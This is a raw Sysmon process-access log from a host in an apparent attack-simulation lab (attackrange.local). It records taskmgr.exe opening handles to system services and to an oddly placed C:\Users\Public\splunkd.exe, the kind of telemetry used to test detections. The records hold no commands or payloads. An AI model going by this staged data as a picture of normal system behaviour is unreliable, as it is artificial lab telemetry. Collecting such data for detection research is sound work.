21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2B00-00000000A301}2724C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204923Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2B00-00000000A301}2724C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204922Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2A00-00000000A301}2748C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204921Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2A00-00000000A301}2748C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204920Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2A00-00000000A301}2748C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204919Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2A00-00000000A301}2748C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204918Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2A00-00000000A301}2748C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204917Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2900-00000000A301}2708C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204916Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2900-00000000A301}2708C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204915Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2900-00000000A301}2708C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204914Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2900-00000000A301}2708C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204913Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2900-00000000A301}2708C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204912Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2800-00000000A301}2796C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204911Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2800-00000000A301}2796C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204910Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2800-00000000A301}2796C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204909Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2800-00000000A301}2796C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204908Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2800-00000000A301}2796C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204907Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC9-6019-2600-00000000A301}3020C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204906Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC9-6019-2600-00000000A301}3020C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204905Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC9-6019-2600-00000000A301}3020C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204904Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC9-6019-2600-00000000A301}3020C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204903Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2400-00000000A301}2904C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204902Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2400-00000000A301}2904C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204901Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2400-00000000A301}2904C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204900Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2400-00000000A301}2904C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204899Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2300-00000000A301}2896C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204898Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2300-00000000A301}2896C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204897Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2300-00000000A301}2896C:\Users\Public\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204896Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2300-00000000A301}2896C:\Users\Public\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204895Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC3-6019-2300-00000000A301}2896C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204894Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC0-6019-2100-00000000A301}2380C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204893Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC0-6019-2100-00000000A301}2380C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204892Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC0-6019-2100-00000000A301}2380C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204891Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CC0-6019-2100-00000000A301}2380C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204890Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1700-00000000A301}1628C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204889Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.790{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-1700-00000000A301}1628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 